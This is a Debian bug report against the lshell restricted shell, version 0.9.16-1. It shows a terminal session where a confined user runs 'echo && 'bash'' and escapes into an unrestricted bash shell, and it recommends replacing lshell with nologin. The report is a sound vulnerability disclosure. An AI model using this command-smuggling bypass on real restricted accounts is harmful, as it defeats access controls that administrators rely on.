Package: lshell Version: 0.9.16-1 Severity: grave Tags: security upstream Justification: user security hole
lshell fails to parse shell syntax correctly and restrictions can be overrun: root@debian:~# getent passwd testuser testuser:x:1001:1001:,,,:/home/testuser:/usr/bin/lshell root@debian:~# su - testuser You are in a limited shell. Type '?' or 'help' to get the list of allowed commands testuser:~$ ? cd clear echo exit help history ll lpath ls lsudo testuser:~$ bash *** forbidden command: bash testuser:~$ echo && 'bash' testuser@debian:~$ ps -f UID PID PPID C STIME TTY TIME CMD testuser 4000 3999 0 23:12 pts/1 00:00:00 /usr/bin/python /usr/bin/lshell testuser 4001 4000 0 23:12 pts/1 00:00:00 sh -c set -m; echo && 'bash' testuser 4002 4001 0 23:12 pts/1 00:00:00 bash testuser 4007 4002 0 23:13 pts/1 00:00:00 ps -f Problem exists in current upstream code. There are opened issue on Github but no reaction yet: https://github.com/ghantoos/lshell/issues/147. Command parser in this shell is beyound of recovery. I recommend to replace this shell with symlink to /usr/sbin/nologin. -- System Information: Debian Release: 8.5 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages lshell depends on: ii adduser 3.113+nmu3 ii python 2.7.9-1 lshell recommends no packages. lshell suggests no packages. -- no debconf information
